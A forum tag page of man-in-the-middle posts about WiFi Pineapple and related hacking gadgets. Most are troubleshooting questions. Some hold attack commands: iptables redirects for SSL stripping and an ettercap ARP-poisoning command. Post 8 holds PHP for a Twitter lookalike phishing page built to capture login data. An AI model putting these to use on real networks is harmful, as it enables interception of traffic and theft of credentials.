Showing results for tags 'mitm'.
Found 18 results

  1. Hello, I've been attempting to redirect port 80 to port 8080 using iptables v1.8.3 to test an SSL strip MITM attack. I've entered the command:

         iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080

     Upon entering it, it gives me the error: unknown option "--dport". It also doesn't recognize the "--to-port" option. I'm running Kali Linux on a Raspberry Pi 4B 4GB. Does anyone know how I can resolve this? I haven't found anything useful on the web after three days of troubleshooting. Cheers! -MichaelPV
  2. I have a payload idea for the Packet Squirrel. The idea is to use the Bash Bunny or the Rubber Ducky to install a certificate on a victim's computer, then deploy the Packet Squirrel to be able to decrypt all HTTPS traffic. I'm just wondering two things. First, does anybody know any decent MITM program that the Packet Squirrel can actually run? I have looked at bettercap, but it runs on Ruby so I'm unsure if it will work with the Packet Squirrel. I have also looked a bit into mitmproxy, but I found the documentation vague. If it can't be run on the Packet Squirrel, maybe you could connect the Bash Bunny to it to perform the MITM attack.
  3. Hi, I have a WiFi Pineapple Nano which I recently purchased with the intention of testing the following. Scenario: smart devices and a smartphone within a home environment, with apps on the smartphone used to manage these devices, all connected to the GuestWiFi WLAN. I have a HomeWiFi WLAN to which I connect my laptop and other computing devices. Both WLANs use the same powerline home extender service (TP-Link). I wish to: 1) use the Nano to sniff traffic on the GuestWiFi WLAN; 2) perform a MITM by either creating a PineappleWiFi SSID and forcing all devices to connect to it, or faking/spoofing the GuestWiFi. I updated the Nano to the latest firmware, 2.5.4, and have connected it to a MacBook Pro 2018 via USB (through a USB-C-to-USB adapter). The Nano also has a 32GB SD card so I can install modules on it. I assigned it on the Internet sharing interface and it is accessible (via the management portal in a browser and via SSH), and it can access the Internet (including resolving different websites). Recon works well, and I have put the smartphone and all connected devices in the allowed MACs part, and the GuestWiFi in the allowed SSID part, in the Filters section. My issue lies in being able to do 1) (I must be missing something here) and 2). Re (1), I enabled WiFi client mode to connect to GuestWiFi, but the problem is that it says enabling PineAP conflicts with wlan1. Is this a case of having to use GuestWiFi just in client mode (and not enabling PineAP) to satisfy (1)? In the case of (2), I enabled PineAP and have Pineapple WiFi. Connecting the smartphone to it results in no Internet access (do I need to do IP forwarding?). Any help would be appreciated. Thanks and Regards,
  4. Hello, I bought a new WiFi Pineapple NANO and I've tried to install the Ettercap module, but I cannot run it, and there is no log to check what is going on. Is there any way to apply a MITM attack on a public network without forcing the clients to connect to my own evil AP? I want to spoof ARP and tcpdump all the traffic to the Nano's SD. Thanks
  5. Hey Guys, with April fools coming up soon I want to try to make an nCage payload for the LanTurtle. For the uninitiated, "nCage" is a Chrome extension that replaces every picture in the web browser with a picture of Nick Cage. I swear I saw somewhere that there was a payload for the LanTurtle that replaced pictures in the browser with pictures of cats, so I figured I could modify that payload, but I couldn't find it. Is anyone familiar with a payload similar to that?
  6. I'm having problems with my SSLsplit v1.1. It's unstable: I click start, but it doesn't start, or it starts but immediately stops, or it stops the internet connection. Any idea what I can do?
  7. OK, so I've set up the Nano with wp6 to share a connection with Kali; this all works spot on. Then I connect to the Nano with my phone, which is also fine. I fire up Wireshark but only see traffic directed from, is this correct? I presumed I would be seeing the IP given to my phone. Should the internet connection be coming from the Nano or the laptop? What interface should I be sniffing? This is slightly baffling my brain, but I know it's so simple; too much eggnog, I think. I know in a moment this will just click in my brain, as I feel I'm putting way too much thought into such a simple process. Thanks all
  8. Hey guys, I've run into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's PHP if there is a path specified in the URL that isn't "index.php". Example landing page code below; var_dump($_POST) on line 12 returns an empty array despite the form sending the data:

         <?php
         if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) {
             /* If not visiting twitter, redirect to non-HSTS twitter domain */
             die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">');
         } else {
             /* form posts to http://twitter.co.uk/sessions */
             if(strstr($_SERVER['REQUEST_URI'], "/sessions")) {
                 /* var_dump($_POST) returns an empty array, should print login data */
                 var_dump($_POST);
                 die();
             }
             /* Curl the site */
             $curl = curl_init();
             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
             curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
             curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
             $result = curl_exec($curl);
             $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */
             $result = str_replace('<script', "<div style='display:none'><!--", $result);
             $result = str_replace('</script', "--></div", $result);
             echo $result;
         }
         ?>

     If I make the form post to http://twitter.co.uk directly, without the /session, they are accessible from the landing page, but I would really like to be able to access them even with other file paths.
  9. Hi everyone, I use the WiFi Pineapple as a man-in-the-middle device, redirecting all traffic to a laptop that the WiFi Pineapple is tethered to, similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/ So here's my setup: a MacBook running a Linux VM (VirtualBox), connected via USB to the WiFi Pineapple, which is sending all traffic to the VirtualBox machine. Pardon my diagram skills :( Here is what I have created, based off of the post above. However, I don't think this is ideal since you would need to SSH into the Pineapple to run this script every time. Ideally it would be best to do this via the web interface of the Pineapple, via a simple "enable proxy" button etc. Any feedback would be appreciated.

         #!/bin/bash
         if [[ $# -eq 0 ]] ; then
             echo "Usage: $0 (enable|disable)"
             exit 1
         fi
         action="$1"
         case $action in
             enable)
                 echo "Enabling ..."
                 iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination
                 #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination
                 iptables -t nat -A POSTROUTING -j MASQUERADE
                 ;;
             disable)
                 echo "Disabling ..."
                 iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination
                 #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination
                 ;;
             *)
                 echo "Usage: $0 (enable|disable)"
                 exit 1
                 ;;
         esac
  10. Hi Everyone! I am trying to achieve this scenario: a client connects to the management AP and gets an IP address from the Pineapple. A PC on the same Pineapple network has the same subnet address of. I want to be able to forward all traffic from the client device onto the PC, which is running Burp Suite. I have tried almost every thread that I can find, and whatever I do I cannot get this traffic from the device through Burp Suite. Is it actually possible to do this? As in, a client connects to the Pineapple network and then the traffic is passed through to Burp Suite? My setup in Burp Suite was to listen on all interfaces on port 8080. Then I tried the specific address of the Burp PC with 8080, but still no traffic coming through. The only way I have got it to work slightly is by configuring the client device to use a proxy which directs straight to the PC using Burp. This then causes problems with SSL connections failing (which I expected, but it was worth a long shot). I then started to run SSLstrip on the Pineapple to try and see if that would help, but no, the web pages would not load due to the SSL connections failing. When I do proxy straight through to the PC running Burp, the websites again do not load and I am stuck with a loading screen for whatever I'm using. Obviously this isn't ideal, and I'm hoping to use this in a presentation coming up very soon. I have been ripping my hair out over this for about a week now... surely it's not this hard!! Any help would be appreciated, mainly getting traffic flowing from the Pineapple to Burp! THANKS!!!! w
  11. After using MITMf for a while on my Kali Linux machine, I'm wondering whether it would be feasible to use it on a Bash Bunny. You'd have to be able to pull things like the gateway and DNS server automatically, but beyond that the only problem I can think of is the complex dependencies for MITMf. Thoughts?
  12. Hey all, the Tetra allows us to do so many great things. We can spoof the SSID and make a client think they are connecting to a "known" AP. The client has the WPA2 password stored to automatically connect to its "known" AP. Why can't we spoof the SSID (and MAC if necessary) but also prompt for a passkey (WEP/WPA/WPA2 depending on the legitimate AP) and sniff the passkey that the client sends? I have a feeling the issue has to do with hashing done at each side of the 4-way handshake. It just seems like we should be able to MITM some of this. Appreciate anyone's input and teaching me like I'm 5. If the answer is something like "we do see all the hashes, which is why you then have to brute force/dictionary them to turn them to clear text", then why are we unable to "pass the hash" with WiFi?
  13. Hi guys! I recently became interested in deploying a MITM attack in my home network. I first used SSLsplit and ettercap from the Pineapple web interface (which is a little bit buggy sometimes). From there, the attack worked 1/3 of the time. Then I tried to do this from the CLI. ettercap seems to work pretty well (ettercap -Tqi wlan1 -M arp:remote // //) but I didn't manage to get SSLstrip working... And if I try to run SSLstrip from the GUI, the certs are signed by "SSLStrip", which causes security warnings. Is there a way to generate custom certs and pass them to the SSLstrip GUI? Thanks! PS: I observed that when the attack is going on, it's really slow to browse the internet... Is that normal? Sorry for my bad English
  14. Hello, I have one question about the LAN Turtle. When I connect the LAN Turtle to a PC in a "big" network, the LAN Turtle has access to the network, doesn't it? When I want to start a MITM attack, does the target device only have to be in the same network, or should I connect the LAN Turtle directly to the targeted device? So for example, if I plug the LAN Turtle into "PC206" and I want to attack "PC259", does it work, or should I plug the Turtle into PC259? I hope you understand my question :) Thanks in advance, Simon PS: sorry for my bad English, I'm not a native speaker
  15. Hello, I was wondering what are the different techniques you guys use for a man in the middle attack. Just for something to learn and advance on. Thanks.
  16. I am completely and utterly disappointed. I have been searching for weeks to find out how to perform an ARP poisoning MITM attack to sniff plain text credentials; the best thing I could find was Responder. There is no guide on how to use this explicitly on the WiFi Pineapple. I have basically paid $250 for a box. The last person to ask about this did not get anywhere in terms of help either. Please, can somebody in this entire forum show me how I can configure Responder to work on a wireless network, like from the ground level? What options do I select, do I connect in client mode (wlan1, wlan0) etc.? Please, this was a big investment for me.
  17. Hello Wonderful People, so I'm hitting a snag with an attack I'm trying to carry out and could really use anyone's help trying to troubleshoot this. I've got the theory down and get halfway, but can't seem to jump the last hurdle. So here's the gist: I'm trying to MITM devices connecting to my TETRA using Burp Suite to capture any HTTP or HTTPS traffic so that I can observe/modify (you know the drill) the HTTP/S traffic. Thing is, I can capture the traffic and MITM successfully with the TETRA (I am able to see all traffic passing through my attack machine within Wireshark). However, I can't seem to get that traffic into Burp. I'm only interested in sending HTTP/S traffic to Burp; all other traffic can head on out to the Internet. I've tried using iptables rules to preroute the traffic bound for dport 80 or 443 to the Burp proxy listening on 8080 (and tried individual listeners on 80 and 443 to no avail), but no traffic seems to get to it... well, to an extent. If I grab the HTTP header of google.com whilst routing traffic to Burp, I can grab an HTTP header for Burp itself. Here's a diagram because I like making them: Attacker's IP (Eth1) is Eth0 IP is (LAN has Internet connectivity via gateway at ETH0 and 1 are wired (I wire into the ETH port of my TETRA). Mobile devices are connecting via WiFi (PineAP). It's simple enough in my head: have all traffic coming in over ETH1 that is destined for 80 or 443 re-route to the Burp listener... but it doesn't seem to work correctly.
      Here are the iptables rules I was creating to try and route the traffic (applied on the attacker's machine):

          iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to
          iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to

      And IP forwarding is enabled on the attacker's machine with:

          sysctl net.ipv4.ip_forward=1

      I'm still trying out stuff; the next thing is to route HTTP/S traffic from ETH1 to LO (seeing as the listener is on LO), but I know from previous posts there are legends on these forums and would appreciate some pokes in the right direction if anyone has any ideas. And yes, I did look around the forums and on the Internet, but I can't seem to find the thing that works. Any thoughts are welcome. Think this might be a cool addition to the forums if we can get it going. Thanks.
  18. Hey everyone, I am wondering if you guys have any specific steps you take once you are the MITM? What kind of things are you trying to do with the packets? Push Java applets to clients? Use Karmetasploit? Since SSLstrip is no longer working, what types of things are you doing to guarantee the most data out of your "victims"? I am particularly interested in emails, social media, etc... Assuming it's been approved by the client I am auditing. I really want to show some examples of what can go wrong for a client site when a MITM attack is successfully executed using the Pineapple, any ideas?